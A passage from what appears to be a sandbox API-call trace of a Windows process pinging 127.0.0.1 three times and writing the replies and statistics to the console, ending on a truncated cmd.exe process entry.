lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _write (in: _FileHandle=1, _Buf=0x1228a78*, _MaxCharCount=0x9 | out: _Buf=0x1228a78*) returned 9 [0075.959] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.959] LocalFree (hMem=0x1228a78) returned 0x0 [0075.959] LocalFree (hMem=0x1237b08) returned 0x0 [0075.959] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xfaf38c, nSize=0x0, Arguments=0xfaf388 | out: lpBuffer="笈ģﵜú➷\x94䰨盪✧") returned 0x9 [0075.959] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.959] GetFileType (hFile=0x28) returned 0x2 [0075.959] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf350 | out: lpMode=0xfaf350) returned 0 [0075.959] GetLastError () returned 0x6 [0075.959] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.959] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.959] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228a78 [0075.959] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1228a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _write (in: _FileHandle=1, _Buf=0x1228a78*, _MaxCharCount=0x9 | out: _Buf=0x1228a78*) returned 9 [0075.959] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.959] LocalFree (hMem=0x1228a78) returned 0x0 [0075.959] LocalFree (hMem=0x1237b08) returned 0x0 [0075.959] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="笈ģﵜú⟘\x94䰨盪✨") returned 0x9 [0075.959] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.959] GetFileType (hFile=0x28) returned 0x2 [0075.959] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0075.959] GetLastError () returned 0x6 [0075.959] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✨") returned 0x0 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.959] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.959] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228a78 [0075.959] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1228a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _write (in: _FileHandle=1, _Buf=0x1228a78*, _MaxCharCount=0x9 | out: _Buf=0x1228a78*) returned 9 [0075.959] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.959] _fileno (_File=0x76ea4c28) returned 1 [0075.959] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.959] LocalFree (hMem=0x1228a78) returned 0x0 [0075.959] LocalFree (hMem=0x1237b08) returned 0x0 [0075.960] Sleep (dwMilliseconds=0x3e8) [0076.961] IcmpSendEcho2Ex (in: IcmpHandle=0x1226a30, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x122c138, RequestSize=0x20, RequestOptions=0xfaf404, ReplyBuffer=0x1235270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1235270) returned 0x1 [0076.961] InetNtopW (in: Family=2, pAddr=0xfaf3f4, pStringBuf=0xfaf51c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0076.961] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="羠ģﵜú⛔\x94䰨盪✣") returned 0x16 [0076.961] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0076.961] _fileno (_File=0x76ea4c28) returned 1 [0076.962] _get_osfhandle (_FileHandle=1) returned 0x28 [0076.962] GetFileType (hFile=0x28) returned 0x2 [0076.962] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0076.962] GetLastError () returned 0x6 [0076.962] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✣") returned 0x0 [0076.962] _fileno (_File=0x76ea4c28) returned 1 [0076.962] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0076.962] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0076.962] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1237fd8 [0076.962] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1237fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0076.962] _fileno (_File=0x76ea4c28) returned 1 [0076.962] _write (in: _FileHandle=1, _Buf=0x1237fd8*, _MaxCharCount=0x16 | out: _Buf=0x1237fd8*) returned 22 [0076.962] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0076.962] _fileno (_File=0x76ea4c28) returned 1 [0076.962] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0076.962] LocalFree (hMem=0x1237fd8) returned 0x0 [0076.962] LocalFree (hMem=0x1237fa0) returned 0x0 [0076.962] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="羠ģﵜú⛿\x94䰨盪✼") returned 0x9 [0076.962] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0076.962] _fileno (_File=0x76ea4c28) returned 1 [0076.962] _get_osfhandle (_FileHandle=1) returned 0x28 [0076.962] GetFileType (hFile=0x28) returned 0x2 [0076.962] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0076.962] GetLastError () returned 0x6 [0076.962] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✼") returned 0x0 [0076.962] _fileno (_File=0x76ea4c28) returned 1 [0076.962] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0076.962] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.962] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228928 [0076.962] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1228928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0076.962] _fileno (_File=0x76ea4c28) returned 1 [0076.962] _write (in: _FileHandle=1, _Buf=0x1228928*, _MaxCharCount=0x9 | out: _Buf=0x1228928*) returned 9 [0076.962] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0076.963] LocalFree (hMem=0x1228928) returned 0x0 [0076.963] LocalFree (hMem=0x1237fa0) returned 0x0 [0076.963] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xfaf38c, nSize=0x0, Arguments=0xfaf388 | out: lpBuffer="羠ģﵜú➷\x94䰨盪✧") returned 0x9 [0076.963] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _get_osfhandle (_FileHandle=1) returned 0x28 [0076.963] GetFileType (hFile=0x28) returned 0x2 [0076.963] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf350 | out: lpMode=0xfaf350) returned 0 [0076.963] GetLastError () returned 0x6 [0076.963] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0076.963] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.963] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228928 [0076.963] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1228928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _write (in: _FileHandle=1, _Buf=0x1228928*, _MaxCharCount=0x9 | out: _Buf=0x1228928*) returned 9 [0076.963] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0076.963] LocalFree (hMem=0x1228928) returned 0x0 [0076.963] LocalFree (hMem=0x1237fa0) returned 0x0 [0076.963] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="羠ģﵜú⟘\x94䰨盪✨") returned 0x9 [0076.963] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _get_osfhandle (_FileHandle=1) returned 0x28 [0076.963] GetFileType (hFile=0x28) returned 0x2 [0076.963] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0076.963] GetLastError () returned 0x6 [0076.963] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✨") returned 0x0 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0076.963] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.963] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228a78 [0076.963] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1228a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _write (in: _FileHandle=1, _Buf=0x1228a78*, _MaxCharCount=0x9 | out: _Buf=0x1228a78*) returned 9 [0076.963] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0076.963] _fileno (_File=0x76ea4c28) returned 1 [0076.963] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0076.963] LocalFree (hMem=0x1228a78) returned 0x0 [0076.963] LocalFree (hMem=0x1237fa0) returned 0x0 [0076.963] Sleep (dwMilliseconds=0x3e8) [0077.977] IcmpSendEcho2Ex (in: IcmpHandle=0x1226a30, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x122c138, RequestSize=0x20, RequestOptions=0xfaf404, ReplyBuffer=0x1235270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1235270) returned 0x1 [0077.977] InetNtopW (in: Family=2, pAddr=0xfaf3f4, pStringBuf=0xfaf51c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0077.977] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="羠ģﵜú⛔\x94䰨盪✣") returned 0x16 [0077.977] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.977] _fileno (_File=0x76ea4c28) returned 1 [0077.977] _get_osfhandle (_FileHandle=1) returned 0x28 [0077.977] GetFileType (hFile=0x28) returned 0x2 [0077.977] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0077.977] GetLastError () returned 0x6 [0077.977] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✣") returned 0x0 [0077.977] _fileno (_File=0x76ea4c28) returned 1 [0077.977] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0077.977] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0077.977] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1237fd8 [0077.978] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1237fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _write (in: _FileHandle=1, _Buf=0x1237fd8*, _MaxCharCount=0x16 | out: _Buf=0x1237fd8*) returned 22 [0077.978] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0077.978] LocalFree (hMem=0x1237fd8) returned 0x0 [0077.978] LocalFree (hMem=0x1237fa0) returned 0x0 [0077.978] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="羠ģﵜú⛿\x94䰨盪✼") returned 0x9 [0077.978] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _get_osfhandle (_FileHandle=1) returned 0x28 [0077.978] GetFileType (hFile=0x28) returned 0x2 [0077.978] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0077.978] GetLastError () returned 0x6 [0077.978] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✼") returned 0x0 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0077.978] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0077.978] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228958 [0077.978] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1228958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _write (in: _FileHandle=1, _Buf=0x1228958*, _MaxCharCount=0x9 | out: _Buf=0x1228958*) returned 9 [0077.978] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0077.978] LocalFree (hMem=0x1228958) returned 0x0 [0077.978] LocalFree (hMem=0x1237fa0) returned 0x0 [0077.978] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xfaf38c, nSize=0x0, Arguments=0xfaf388 | out: lpBuffer="羠ģﵜú➷\x94䰨盪✧") returned 0x9 [0077.978] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _get_osfhandle (_FileHandle=1) returned 0x28 [0077.978] GetFileType (hFile=0x28) returned 0x2 [0077.978] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf350 | out: lpMode=0xfaf350) returned 0 [0077.978] GetLastError () returned 0x6 [0077.978] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0077.978] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0077.978] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228a90 [0077.978] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1228a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _write (in: _FileHandle=1, _Buf=0x1228a90*, _MaxCharCount=0x9 | out: _Buf=0x1228a90*) returned 9 [0077.978] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.978] _fileno (_File=0x76ea4c28) returned 1 [0077.978] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0077.978] LocalFree (hMem=0x1228a90) returned 0x0 [0077.978] LocalFree (hMem=0x1237fa0) returned 0x0 [0077.978] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xfaf388, nSize=0x0, Arguments=0xfaf384 | out: lpBuffer="羠ģﵜú⟘\x94䰨盪✨") returned 0x9 [0077.978] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _get_osfhandle (_FileHandle=1) returned 0x28 [0077.979] GetFileType (hFile=0x28) returned 0x2 [0077.979] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf34c | out: lpMode=0xfaf34c) returned 0 [0077.979] GetLastError () returned 0x6 [0077.979] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf2b0, nSize=0x50 | out: lpBuffer="ú✨") returned 0x0 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.979] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0077.979] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1228a78 [0077.979] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1228a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _write (in: _FileHandle=1, _Buf=0x1228a78*, _MaxCharCount=0x9 | out: _Buf=0x1228a78*) returned 9 [0077.979] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.979] LocalFree (hMem=0x1228a78) returned 0x0 [0077.979] LocalFree (hMem=0x1237fa0) returned 0x0 [0077.979] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xfaf310, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0077.979] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xfaf2e4, nSize=0x0, Arguments=0xfaf2e0 | out: lpBuffer="羠ģú᧰\x94䰨盪❏") returned 0x5c [0077.979] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _get_osfhandle (_FileHandle=1) returned 0x28 [0077.979] GetFileType (hFile=0x28) returned 0x2 [0077.979] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf2a8 | out: lpMode=0xfaf2a8) returned 0 [0077.979] GetLastError () returned 0x6 [0077.979] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf20c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.979] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0077.979] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x1238068 [0077.979] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x1238068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _write (in: _FileHandle=1, _Buf=0x1238068*, _MaxCharCount=0x5c | out: _Buf=0x1238068*) returned 92 [0077.979] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.979] LocalFree (hMem=0x1238068) returned 0x0 [0077.979] LocalFree (hMem=0x1237fa0) returned 0x0 [0077.979] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xfaf2f0, nSize=0x0, Arguments=0xfaf2ec | out: lpBuffer="羠ģúᨧ\x94䰨盪❓") returned 0x61 [0077.979] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.979] _get_osfhandle (_FileHandle=1) returned 0x28 [0077.979] GetFileType (hFile=0x28) returned 0x2 [0077.979] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xfaf2b4 | out: lpMode=0xfaf2b4) returned 0 [0077.979] GetLastError () returned 0x6 [0077.979] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xfaf218, nSize=0x50 | out: lpBuffer="ú❓") returned 0x0 [0077.979] _fileno (_File=0x76ea4c28) returned 1 [0077.980] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0077.980] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0077.980] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x1238070 [0077.980] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x1238070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0077.980] _fileno (_File=0x76ea4c28) returned 1 [0077.980] _write (in: _FileHandle=1, _Buf=0x1238070*, _MaxCharCount=0x61 | out: _Buf=0x1238070*) returned 97 [0077.980] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0077.980] _fileno (_File=0x76ea4c28) returned 1 [0077.980] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0077.980] LocalFree (hMem=0x1238070) returned 0x0 [0077.980] LocalFree (hMem=0x1237fa0) returned 0x0 [0077.980] IcmpCloseHandle (IcmpHandle=0x1226a30) returned 1 [0077.980] LocalFree (hMem=0x122c138) returned 0x0 [0077.980] LocalFree (hMem=0x1235270) returned 0x0 [0077.980] WSACleanup () returned 0 [0077.980] exit (_Code=0) Thread: id = 188 os_tid = 0xb50 Thread: id = 189 os_tid = 0xb5c Process: id = "58" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1319a000" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = 